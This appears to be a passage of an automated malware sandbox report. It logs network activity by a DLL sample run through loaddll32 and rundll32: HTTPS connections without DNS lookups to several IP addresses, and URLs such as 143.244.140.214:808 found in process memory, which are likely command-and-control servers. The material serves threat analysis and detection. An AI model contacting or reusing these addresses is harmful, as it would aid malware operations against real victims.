                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:38 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:38 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: rundll32.exe, 00000004.00000003.377435107.00000000056FF000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsF
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: rundll32.exe, 00000004.00000003.376611572.00000000056FD000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?f09641962053d
                      Source: loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmpString found in binary or memory: https://14.77.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.390529394.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/Q#
                      Source: rundll32.exe, 00000004.00000003.390529394.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/v
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.497146679.000000000166F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.400716165.0000000001673000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.400716165.0000000001673000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/#Gq
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/%)
                      Source: loaddll32.exe, 00000000.00000003.756126236.000000000166D000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.567390680.00000000056FE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/&
                      Source: loaddll32.exe, 00000000.00000003.395037799.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/-ZY
                      Source: loaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/0
                      Source: loaddll32.exe, 00000000.00000003.399573978.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/3
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/7)
                      Source: loaddll32.exe, 00000000.00000003.739023483.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/8D
                      Source: loaddll32.exe, 00000000.00000003.594551032.0000000001673000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/8DH
                      Source: loaddll32.exe, 00000000.00000003.414827142.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/B
                      Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/F)
                      Source: loaddll32.exe, 00000000.00000003.414827142.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.730453084.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/H
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/K(
                      Source: loaddll32.exe, 00000000.00000003.739023483.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/My
                      Source: loaddll32.exe, 00000000.00000003.742305887.000000000166F000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/O
                      Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/O)
                      Source: loaddll32.exe, 00000000.00000003.658533321.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/P
                      Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/Q)
                      Source: loaddll32.exe, 00000000.00000003.408181456.000000000166E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/S
                      Source: loaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/Y
